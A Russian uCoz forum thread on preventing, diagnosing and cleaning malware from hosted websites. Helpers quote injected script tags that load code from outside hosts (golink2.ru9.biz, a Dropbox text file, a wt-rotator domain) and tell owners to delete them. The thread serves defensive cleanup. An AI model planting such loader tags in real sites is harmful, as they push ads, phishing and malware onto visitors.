Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    Wanderer1979
    Сообщений: 2
    Репутация: 0

    Сообщение # 556 | 10:30:17 11 Сен 2013
    Помогите разобраться, сайт avtodefolt.clan.su, постоянные банеры, куда лезть и где стирать?

    ВОт что обнаружилось http://antivirus-alarm.ru

    IkarusExploit.HTML.IframeRef

    NormanIframe.WC

    NANO-AntivirusTrojan.Script.IFrame.btdnqa
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 557 | 10:54:40 11 Сен 2013
    Wanderer1979, для начала смените пароль uID профиля

    После смены пароля удалите со всех шаблонов выделенное

    Wanderer1979
    Сообщений: 2
    Репутация: 0

    Сообщение # 558 | 12:16:38 11 Сен 2013
    Все ok. Оперативно работаете!!!
    stas2175
    Сообщений: 3
    Репутация: -10
    Уровень замечаний:

    Сообщение # 559 | 15:34:21 12 Сен 2013
    Прошу помочь найти вредоносный код.Сегодня яндекс прислал письмо что на странице присутствует вредоносный код. Вот страница на сайт

    http://www.super-zarobotok.ru/index....-21 Вердикт
    Поведенческий анализ
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 560 | 15:39:19 12 Сен 2013
    stas2175, рекламу проредите на странице
    advbox 5 раз и это явный перебор. контента на странице ровно в три раза меньше чем рекламы. плюс то, что есть немногое - это ссылки на сторонние ресурсы. и автосерфу поисковые системы в том числе яндекс не очень хорошо относятся. а у вас тьма ссылок
    поведенческий ставят по рекламе
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    stas2175
    Сообщений: 3
    Репутация: -10
    Уровень замечаний:

    Сообщение # 561 | 15:48:59 12 Сен 2013
    спс но мне все же нужно найти вредоносный код
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 562 | 15:50:55 12 Сен 2013
    stas2175, вас блокнули не по вредоносному коду а по поведенческому. но если вы настаиваете, то ищите вредоносный код. или можете сделать ещё проще. напишите в тех.поддержку яндекса и потребуйте образцы
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    stas2175
    Сообщений: 3
    Репутация: -10
    Уровень замечаний:

    Сообщение # 563 | 15:52:40 12 Сен 2013
    спс
    clubtenerife
    Сообщений: 1
    Репутация: 0

    Сообщение # 564 | 02:39:06 15 Сен 2013
    Помогите убрать порно-рекламу на clubtenerife.ru !!!
    1115992
    Сообщений: 2
    Репутация: 0

    Сообщение # 565 | 13:40:21 15 Сен 2013
    Помогите с сайтом http://alternative-spb.3dn.ru/#

    При переходе в личные сообщения и не только делается переход на фальшконтакт,типа введите логин пароль,иначе блокировка,короче стандартный развод.

    Как убрать,где рыться?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 566 | 13:45:56 15 Сен 2013
    1115992, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вписываете скрипт

    Код
    <script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>
    поле на что заменить оставляете пустым и производите замену во всех модулях

    после очистки обязательно меняем uID пароль профиля, которым администрируете сайт. инструкция тут //forum.ucoz.ru/forum/45-52299-1
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 567 | 13:50:53 15 Сен 2013
    clubtenerife, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вписываете скрипт

    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/tnwyduomjbcsxzm/opapo.txt"></script>


    поле на что заменить оставляете пустым и производите замену во всех модулях

    после очистки обязательно меняем uID пароль профиля, которым администрируете сайт. инструкция тут //forum.ucoz.ru/forum/45-52299-1

    и удалите останки расширений вашего хрома из кода. они туда попали при редактировании кода в визуалке
    Код

    <script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/document_iterator.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/find_proxy.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/get_html_text.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/global_constants.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/name_injection_builder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/number_injection_builder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/menu_injection_builder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/string_finder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/change_sink.js"></script><meta name="document_iterator.js"><meta name="find_proxy.js"><meta name="get_html_text.js"><meta name="global_constants.js"><meta name="name_injection_builder.js"><meta name="number_injection_builder.js"><meta name="menu_injection_builder.js"><meta name="string_finder.js"><meta name="change_sink.js"><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/document_iterator.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/find_proxy.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/get_html_text.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/global_constants.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/name_injection_builder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/number_injection_builder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/menu_injection_builder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/string_finder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/change_sink.js"></script><meta name="document_iterator.js"><meta name="find_proxy.js"><meta name="get_html_text.js"><meta name="global_constants.js"><meta name="name_injection_builder.js"><meta name="number_injection_builder.js"><meta name="menu_injection_builder.js"><meta name="string_finder.js"><meta name="change_sink.js">


    пробуйте удалить этот мусор тоже через быструю замену, но многострочный режим. вставляете в поле весь мусор (копируете отсюда) и поле на что заменить как всегда оставляйте пустым и производите замену
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    1115992
    Сообщений: 2
    Репутация: 0

    Сообщение # 568 | 14:46:10 15 Сен 2013
    Огромное спасибо!!!
    IIoJIb3oBaTeJIb
    Сообщений: 373
    Репутация: 21

    Сообщение # 569 | 08:46:58 16 Сен 2013
    Ребят привет, сканировал свой сайт на вирусы ( там их полно )
    Вопрос такой: как удалить?
    http://vms.drweb.com/online проверял этим сайтом Доктора.
    Всё для антивирусов: Ключи, Базы, Софт и другое - Antivirus-world.do.am
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 570 | 10:20:47 16 Сен 2013
    IIoJIb3oBaTeJIb, удаляй:
    1. перед body скрипт:
    <script language="javascript" src="http://uno.wt-rotator105.ru/?t=cf&noadult=1&pid=37303"></script>

    2. в футере:
    <script src="http://info-cinema.3dn.ru/designs_164/scrolltopcontrol-up.js" type="text/javascript"></script>

    смени uID пароль профиля //forum.ucoz.ru/forum/45-52299-1
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: